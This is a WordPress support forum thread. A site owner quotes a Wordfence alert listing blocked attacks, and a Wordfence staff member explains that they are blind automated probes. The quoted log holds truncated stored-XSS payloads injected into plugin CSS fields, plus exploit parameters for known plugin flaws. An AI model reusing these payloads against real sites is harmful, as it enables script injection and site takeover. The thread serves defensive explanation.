Increased attacks

  • Resolved RSV-blog

    (@rsv-blog)


    6 years, 11 months ago

    I just got an email with this notification:

    he Wordfence Web Application Firewall has blocked 134 attacks over the last 10 minutes. Below is a sample of these recent attacks:

    July 1, 2019 6:23pm 91.134.140.200 (France) Blocked for Blog Designer <= 1.8.10 – Unauthenticated Stored Cross-Site Scripting in POST body: custom_css=</style><script async=true type=text/javascript language=javascript>var nt = String.fromCharCode(98ê
    July 1, 2019 6:23pm 222.73.242.180 (China) Blocked for WP GDPR Compliance <= 1.4.2 – Update Any Option / Call Any Action in POST body: action=wpgdprc_process_action
    July 1, 2019 6:23pm 91.134.140.200 (France) Blocked for Blog Designer <= 1.8.10 – Unauthenticated Stored Cross-Site Scripting in POST body: custom_css=</style><script async=true type=text/javascript language=javascript>var nt = String.fromCharCode(98ê
    July 1, 2019 6:23pm 91.134.140.200 (France) Blocked for Blog Designer <= 1.8.10 – Unauthenticated Stored Cross-Site Scripting in POST body: custom_css=</style><script async=true type=text/javascript language=javascript>var nt = String.fromCharCode(98ê
    July 1, 2019 6:23pm 91.134.140.200 (France) Blocked for XSS: Cross Site Scripting in POST body: domain=</script><script async=true type=text/javascript language=javascript>var nt = String.fromCharCode(9ê
    July 1, 2019 6:23pm 91.134.140.200 (France) Blocked for XSS: Cross Site Scripting in POST body: css=</style><script async=true type=text/javascript language=javascript>var nt = String.fromCharCode(98ê
    July 1, 2019 6:23pm 91.134.140.200 (France) Blocked for XSS: Cross Site Scripting in POST body: otw_pctl_custom_css=</textarea><script async=true type=text/javascript language=javascript>var nt = String.fromCharCodeê
    July 1, 2019 6:23pm 91.134.140.200 (France) Blocked for XSS: Cross Site Scripting in POST body: otw_pctl_custom_css=</textarea><script async=true type=text/javascript language=javascript>var nt = String.fromCharCodeê
    July 1, 2019 6:23pm 222.73.242.180 (China) Blocked for Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update in query string: yp_remote_get=3
    July 1, 2019 6:23pm 91.134.140.200 (France) Blocked for Total Donations (all known versions) – Multiple Unauthenticated AJAX Actions

    I notice that a number of them say “Scripting in POST body” – where exactly is this posting happening? Comments are turned off for all posts and pages on the site.

    Thanks!

Viewing 2 replies - 1 through 2 (of 2 total)
  • wfdave

    (@wfdave)

    6 years, 11 months ago

    Hi @rsv-blog,

    These attacks are simply blind attempts to see if your website is vulnerable. The attacker does not visit your site and fill in any forms normally. Instead, they send a direct POST request with all the fields filled in and see how your site responds.

    In this situation, Wordfence detected that the fields the attacker sent were malicious and therefore blocked the request. So even if your website was vulnerable to these attacks, Wordfence has made sure that these attacks never even reach your website.

    Dave

    Thread Starter RSV-blog

    (@rsv-blog)

    6 years, 11 months ago

    Thanks!

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Increased attacks’ is closed to new replies.